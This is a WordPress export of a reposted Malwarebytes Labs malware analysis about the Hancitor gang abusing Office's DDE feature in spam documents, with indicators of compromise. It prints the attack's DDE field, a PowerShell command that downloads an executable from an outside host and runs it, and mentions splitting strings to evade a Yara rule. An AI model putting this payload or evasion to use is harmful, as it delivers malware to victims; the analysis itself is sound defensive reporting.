{"id":9936,"date":"2017-10-17T08:10:54","date_gmt":"2017-10-17T16:10:54","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/10\/17\/news-3709\/"},"modified":"2017-10-17T08:10:54","modified_gmt":"2017-10-17T16:10:54","slug":"news-3709","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/10\/17\/news-3709\/","title":{"rendered":"Old MS Office feature weaponized in malspam attacks"},"content":{"rendered":"<p><strong>Credit to Author: J\u00e9r\u00f4me Segura| Date: Tue, 17 Oct 2017 15:00:16 +0000<\/strong><\/p>\n<p>There has been a lot of talks recently following a <a href=\"https:\/\/sensepost.com\/blog\/2017\/macro-less-code-exec-in-msword\/\" target=\"_blank\" rel=\"noopener\">write up and proof of concept<\/a>\u00a0about a Microsoft Office feature that can be misused and weaponized by malicious actors. The protocol, known as\u00a0<a href=\"https:\/\/msdn.microsoft.com\/en-us\/library\/windows\/desktop\/ms648774(v=vs.85).aspx\" target=\"_blank\" rel=\"noopener\">Dynamic Data Exchange<\/a> (DDE), has actually been around for a long time, and allows applications to exchange data and send updates to each other. This feature can be used, for example, to refresh a cell in Excel with data coming from another program.<\/p>\n<p>Now threat actors are using this feature to distribute malware without relying on macros or exploits.<\/p>\n<p>Perhaps what makes this technique most interesting is the fact that malicious actors can craft booby trapped documents void of any macro and still achieve code execution. Macros have been a favourite among spammers but they are highly suspicious, and many system administrators have set up group policies to disable them completely. This is why cybercriminals seek out any other way to deliver malware via Office files.<\/p>\n<p>In the case of the DDE method, no exploits are used. Instead, a social engineering technique is employed to entice users into clicking a prompt.<\/p>\n<p>First, the DDE was used in some<a href=\"http:\/\/blog.talosintelligence.com\/2017\/10\/dnsmessenger-sec-campaign.html\" target=\"_blank\" rel=\"noopener\"> targeted attacks<\/a>. However, now it has become mainstream with the group behind Hancitor (<a href=\"https:\/\/twitter.com\/James_inthe_box\/status\/919941804430041089\" target=\"_blank\" rel=\"noopener\">spotted by<\/a> <a href=\"https:\/\/twitter.com\/James_inthe_box\" target=\"_blank\" rel=\"noopener\">@James_inthe_box <\/a>and DDE <a href=\"https:\/\/twitter.com\/mesa_matt\/status\/919949549023711232\" target=\"_blank\" rel=\"noopener\">identified by<\/a> <a href=\"https:\/\/twitter.com\/mesa_matt\" target=\"_blank\" rel=\"noopener\">@mesa_matt<\/a>), who leveraged it in their latest spam campaign.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/DDE.png\" data-rel=\"lightbox-0\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-20120 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/DDE.png\" alt=\"\" width=\"878\" height=\"592\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/DDE.png 878w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/DDE-300x202.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/DDE-600x405.png 600w\" sizes=\"auto, (max-width: 878px) 100vw, 878px\" \/><\/a><\/p>\n<p>We can find where the malicious code is inserted by checking for any reference to DDE within the document&#8217;s code. <a href=\"https:\/\/twitter.com\/DidierStevens\" target=\"_blank\" rel=\"noopener\">Didier Stevens\u00a0<\/a>published a <a href=\"https:\/\/blog.nviso.be\/2017\/10\/11\/detecting-dde-in-ms-office-documents\/\" target=\"_blank\" rel=\"noopener\">Yara rule<\/a> for this very purpose, but it seems the miscreants evaded detection by splitting the string of interest:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-20121 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/DDE_evasion.png\" alt=\"\" width=\"564\" height=\"449\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/DDE_evasion.png 564w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/DDE_evasion-300x239.png 300w\" sizes=\"auto, (max-width: 564px) 100vw, 564px\" \/><\/p>\n<p>The final code put together looks like this:<\/p>\n<pre>\"DdE\" c:\\Windows\\System32\\cmd.exe \" \/k powershell.exe (New-Object System.Net.  WebClient).DownloadFile('http:\/\/frontiertherapycenter[.]com\/16.exe',  '%TEMP%\\tvs.exe');Start-Process '%TEMP%\\tvs.exe'\"&lt;\/w:instrText&gt;<\/pre>\n<p>The rest of the attack is straight forward, with PowerShell downloading and running the malicious binary (Hancitor) from the %temp% folder.<\/p>\n<h3>Office and malspam<\/h3>\n<p>Microsoft Office is being abused in both targeted and large-scale campaigns by malware authors who use a wide variety of techniques to execute malicious code. The DDE method is not new at all, but it is an example of how forgotten features can come back to haunt us.<\/p>\n<p>Microsoft did not deem this a vulnerability, and so far has not decided to release a patch to render it harmless. One has to wonder how many people are still using DDE for legitimate purposes and consider the validity of retaining it.<\/p>\n<p>Malwarebytes users are already protected against this latest campaign and similar ones.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-20123 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/DDE_block.gif\" alt=\"\" width=\"1256\" height=\"843\" \/><\/p>\n<h3>Indicators of compromise<\/h3>\n<p>Word document<\/p>\n<pre>f945105f5a0bc8ea0d62a28ee62883ffc14377b6abec2d0841e88935fd8902d3<\/pre>\n<p>Hancitor<\/p>\n<pre>8f94cee61a76c7b9612381978876dcd996c15ae8da50fd75d700a05df571d10a<\/pre>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/10\/old-ms-office-feature-weaponized-in-malspam-attacks\/\">Old MS Office feature weaponized in malspam attacks<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/10\/old-ms-office-feature-weaponized-in-malspam-attacks\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: J\u00e9r\u00f4me Segura| Date: Tue, 17 Oct 2017 15:00:16 +0000<\/strong><\/p>\n<table cellpadding='10'>\n<tr>\n<td valign='top' align='center'><a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/10\/old-ms-office-feature-weaponized-in-malspam-attacks\/' title='Old MS Office feature weaponized in malspam attacks'><img src='https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/10\/Untitled-design.png' border='0'  width='300px'  \/><\/a><\/td>\n<\/tr>\n<tr>\n<td valign='top' align='left'>An old Microsoft Office feature has been brought back to the forefront as way to distribute malware without relying on macros or exploits.<\/p>\n<p>Categories: <\/p>\n<ul class=\"post-categories\">\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/malware-threat-analysis\/\" rel=\"category tag\">Malware<\/a><\/li>\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/\" rel=\"category tag\">Threat analysis<\/a><\/li>\n<\/ul>\n<p>Tags: <a href=\"https:\/\/blog.malwarebytes.com\/tag\/dde\/\" rel=\"tag\">DDE<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/ddeauto\/\" rel=\"tag\">DDEAUTO<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/macro\/\" rel=\"tag\">macro<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/malspam\/\" rel=\"tag\">malspam<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/malware\/\" rel=\"tag\">malware<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/microsoft\/\" rel=\"tag\">microsoft<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/office\/\" rel=\"tag\">Office<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/word\/\" rel=\"tag\">word<\/a><\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/10\/old-ms-office-feature-weaponized-in-malspam-attacks\/' title='Old MS Office feature weaponized in malspam attacks'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/10\/old-ms-office-feature-weaponized-in-malspam-attacks\/\">Old MS Office feature weaponized in malspam attacks<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[15859,15860,10515,11928,3764,10516,3245,10494,10882],"class_list":["post-9936","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-dde","tag-ddeauto","tag-macro","tag-malspam","tag-malware","tag-microsoft","tag-office","tag-threat-analysis","tag-word"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9936","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9936"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9936\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9936"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9936"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9936"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}